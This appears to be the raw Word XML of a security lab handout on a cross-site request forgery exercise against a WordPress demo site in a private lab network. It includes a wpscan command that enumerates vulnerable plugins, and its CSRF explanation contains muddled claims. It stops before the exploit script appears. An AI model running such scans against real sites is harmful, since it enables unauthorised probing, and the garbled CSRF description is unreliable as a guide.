                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="37" name="Line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5CD60C6" id="Line 22" o:spid="_x0000_s1026" style="position:absolute;z-index:157414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wA6zAEAAIQDAAAOAAAAZHJzL2Uyb0RvYy54bWysU8GO0zAQvSPxD5bvNG1QyxI13UPLcilQ&#10;aZcPmNpOYuF4LNtt0r9n7LRlgRsiB8vjmXnz5s1k/Tj2hp2VDxptzRezOWfKCpTatjX//vL07oGz&#10;EMFKMGhVzS8q8MfN2zfrwVWqxA6NVJ4RiA3V4GrexeiqogiiUz2EGTplydmg7yGS6dtCehgIvTdF&#10;OZ+vigG9dB6FCoFed5OTbzJ+0ygRvzVNUJGZmhO3mE+fz2M6i80aqtaD67S40oB/YNGDtlT0DrWD&#10;COzk9V9QvRYeAzZxJrAvsGm0ULkH6mYx/6Ob5w6cyr2QOMHdZQr/D1Z8PR8807Lm7z9wZqGnGe21&#10;VawskzaDCxWFbO3Bp+7EaJ/dHsWPwCxuO7CtyhxfLo7yFimj+C0lGcFRhePwBSXFwCliFmpsfJ8g&#10;SQI25nlc7vNQY2SCHlcPq1W5XHImbr4Cqlui8yF+VtizdKm5IdIZGM77EBMRqG4hqY7FJ21MHrex&#10;bKj5x2W5zAkBjZbJmcKCb49b49kZ0sLkL3dFntdhCXkHoZvismtaJY8nK3OVToH8dL1H0Ga6Eytj&#10;ryolYSaJjygvB39Tj0ad6V/XMu3Saztn//p5Nj8BAAD//wMAUEsDBBQABgAIAAAAIQCvCSOl3wAA&#10;AA4BAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT8MwDIXvSPyHyEhcpi3pKiZamk4I6I0LA7Rr1pi2&#10;onG6JtsKvx7vgODmZz89f69YT64XRxxD50lDslAgkGpvO2o0vL1W81sQIRqypveEGr4wwLq8vChM&#10;bv2JXvC4iY3gEAq50dDGOORShrpFZ8LCD0h8+/CjM5Hl2Eg7mhOHu14ulVpJZzriD60Z8KHF+nNz&#10;cBpC9Y776ntWz9Q2bTwu94/PT0br66vp/g5ExCn+meGMz+hQMtPOH8gG0bNWWcpWHm7SJANxtiSZ&#10;WoHY/e5kWcj/NcofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsA&#10;AAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJQbADrMAQAAhAMAAA4A&#10;AAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAK8JI6XfAAAADgEA&#10;AA8AAAAAAAAAAAAAAAAAJgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAyBQAAAAA=&#10;">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:t>Task 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE8F5F5" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="1435"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Objective: In our previous task, we used parameter tampering and xss to enable an attack. Let’s move ahead and attempt a cross-site request forgery attack now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43309C8F" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF2EAA6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="1437"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A Cross-site request forgery, which is referred as CSFR is used by the attacker to send request</w:t>
      </w:r>
      <w:r>
        <w:t>s to vulnerable website from a user’s web browser via malicious web page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1420ADD6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B9A1D1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="1441"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This method is used in scenario’s where the attacker from an outside network to access corporate internetworks, intranets etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208195CF" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265CF999" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="1436"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To be very simple, a request is made using malicious </w:t>
      </w:r>
      <w:r>
        <w:t>code from a valid/ genuine request. Any web application should be capable to detect this, failing which a CSRF attack happens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E01C6D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAF6421" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="1433"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To look at more details about this, an attacker establishes an active session via the victim (user) and forces this legitimate u</w:t>
      </w:r>
      <w:r>
        <w:t>ser browser to send malicious request by parallel visiting malicious site, which will inject an HTTP request for the trusted site into the victim’s user session and thus compromising its integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A11A5C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197D0322" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="840" w:right="1436"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In this method, the attacker will wait for the user to co</w:t>
      </w:r>
      <w:r>
        <w:t>nnect with the server. Once the user is connected and click a malicious link, which was a trap set up by the attacker, the code executes on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEDDC4E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F299BF1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login to Win Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A502CEB" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="101"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Open a browser and type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="0000FF"/>
        </w:rPr>
        <w:t>http://10.0.2.10:8080/wordpress/wp-login.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D7E7F9" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="101"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Wordpress demo website should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EB0290" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="101"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login using your admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE369C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="103" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Click on Plugins, Installed Plugins and you could find Wordpress Firewall 2 is installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7911F8E0" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="59" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="1436"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Click settings and look for Whitelisted IPs and check for your Win Server 2012 IP address. It should be listed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185B365" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Keep your session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413FF3A5" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="101"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D72E57F" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="101"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wpscan –u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="0000FF"/>
        </w:rPr>
        <w:t>http://10.0.2.10:8080/wordpress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-enumerate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB09D6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="101"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>If prompts for updates, Opt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D152245" w14:textId="6B86BD2F" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="103"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487600128" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76A23BA5" wp14:editId="25709812">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1124585</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>306070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5539740" cy="876300"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="36"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9740" cy="876300"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="DADAD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0D9EBB5" w14:textId="13776855" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                            <w:pPr>
                              <w:ind w:left="28"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Record your reflection here. You should look for the WordPress Firewall 2 via installed plugins. Record the location, Title, References etc.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="66EA3FD8" w14:textId="43A03FCC" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:ind w:left="28"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="75BC5863" w14:textId="2F75FC5F" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:ind w:left="28"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>The wpscan would not work.</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A23BA5" id="Text Box 21" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:88.55pt;margin-top:24.1pt;width:436.2pt;height:69pt;z-index:-1571635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9yAwIAAOgDAAAOAAAAZHJzL2Uyb0RvYy54bWysU9uO0zAQfUfiHyy/0/TCdpeo6aq0WoS0&#10;LEi7fIDjOImF4zFjt8ny9YydpizwhlAkazyX4zlnJpvboTPspNBrsAVfzOacKSuh0rYp+Nenuzc3&#10;nPkgbCUMWFXwZ+X57fb1q03vcrWEFkylkBGI9XnvCt6G4PIs87JVnfAzcMpSsAbsRKArNlmFoif0&#10;zmTL+Xyd9YCVQ5DKe/IexiDfJvy6VjJ8rmuvAjMFp95COjGdZTyz7UbkDQrXanluQ/xDF53Qlh69&#10;QB1EEOyI+i+oTksED3WYSegyqGstVeJAbBbzP9g8tsKpxIXE8e4ik/9/sPLh9AWZrgq+WnNmRUcz&#10;elJDYO9hYMtF1Kd3Pqe0R0eJYSA/zTlx9e4e5DfPLOxbYRu1Q4S+VaKi/lJl9qJ0xPERpOw/QUXv&#10;iGOABDTU2EXxSA5G6DSn58tsYi+SnFdXq3fXbykkKXZzvV7N0/AykU/VDn34oKBj0Sg40uwTujjd&#10;+0A8KHVKiY95MLq608akCzbl3iA7CdqTwy5+kTqV/JZmbEy2EMvGcPQkmpHZyDEM5ZAUXU/qlVA9&#10;E2+Ecf3odyGjBfzBWU+rV3D//ShQcWY+WtIu7ulk4GSUkyGspNKCB85Gcx/GfT461E1LyON0LOxI&#10;31on6nEQYxfndmmdEr3z6sd9fXlPWb9+0O1PAAAA//8DAFBLAwQUAAYACAAAACEAWpbQDuAAAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPTUvDQBCG74L/YRnBi9hNQm1jzKaI4k2wVgW9bbPTJDQ7&#10;G3e3Tfz3Tk96m5d5eD/K1WR7cUQfOkcK0lkCAql2pqNGwfvb03UOIkRNRveOUMEPBlhV52elLowb&#10;6RWPm9gINqFQaAVtjEMhZahbtDrM3IDEv53zVkeWvpHG65HNbS+zJFlIqzvihFYP+NBivd8cLOd+&#10;jen31f7lIx8eR/T4vJafu1Gpy4vp/g5ExCn+wXCqz9Wh4k5bdyATRM96uUwZVTDPMxAnIJnf3oDY&#10;8pUvMpBVKf9vqH4BAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAA&#10;AAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAL4v/cgMCAADoAwAADgAA&#10;AAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAWpbQDuAAAAALAQAA&#10;DwAAAAAAAAAAAAAAAABdBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAGoFAAAAAA==&#10;" fillcolor="#dadada" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="60D9EBB5" w14:textId="13776855" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                      <w:pPr>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Record your reflection here. You should look for the WordPress Firewall 2 via installed plugins. Record the location, Title, References etc.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="66EA3FD8" w14:textId="43A03FCC" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="75BC5863" w14:textId="2F75FC5F" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>The wpscan would not work.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Look at the scanned information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED08E81" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Write a script as below in a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>notepad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7B1BF" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D02F84">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566ABFC8" w14:textId="616B2DCB" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15747072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48D71058" wp14:editId="763B7101">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="35" name="Line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E464E74" id="Line 20" o:spid="_x0000_s1026" style="position:absolute;z-index:157470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Cr1zAEAAIQDAAAOAAAAZHJzL2Uyb0RvYy54bWysU02PGjEMvVfqf4hyLwNUoO2IYQ/Q7YW2&#10;SLv9ASbJMFEzcRQHBv59nfCx2/ZWdQ5RHNvPz8+exeOpd+JoIln0jZyMxlIYr1Bbv2/kj5enDw9S&#10;UAKvwaE3jTwbko/L9+8WQ6jNFDt02kTBIJ7qITSySynUVUWqMz3QCIPx7Gwx9pDYjPtKRxgYvXfV&#10;dDyeVwNGHSIqQ8Sv64tTLgt+2xqVvrctmSRcI5lbKmcs5y6f1XIB9T5C6Ky60oB/YNGD9Vz0DrWG&#10;BOIQ7V9QvVURCds0UthX2LZWmdIDdzMZ/9HNcwfBlF5YHAp3mej/wapvx20UVjfy40wKDz3PaGO9&#10;EdOizRCo5pCV38bcnTr557BB9ZOEx1UHfm8Kx5dz4LxJVrP6LSUbFLjCbviKmmPgkLAIdWpjnyFZ&#10;AnEq8zjf52FOSSh+nD/M59MZ81I3XwX1LTFESl8M9iJfGumYdAGG44ZSJgL1LSTX8fhknSvjdl4M&#10;jfw0m85KAqGzOjtzGMX9buWiOEJemPKVrtjzNiwjr4G6S1xxXVYp4sHrUqUzoD9f7wmsu9yZlfNX&#10;lbIweVGp3qE+b+NNPR51oX9dy7xLb+2S/frzLH8BAAD//wMAUEsDBBQABgAIAAAAIQCvCSOl3wAA&#10;AA4BAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT8MwDIXvSPyHyEhcpi3pKiZamk4I6I0LA7Rr1pi2&#10;onG6JtsKv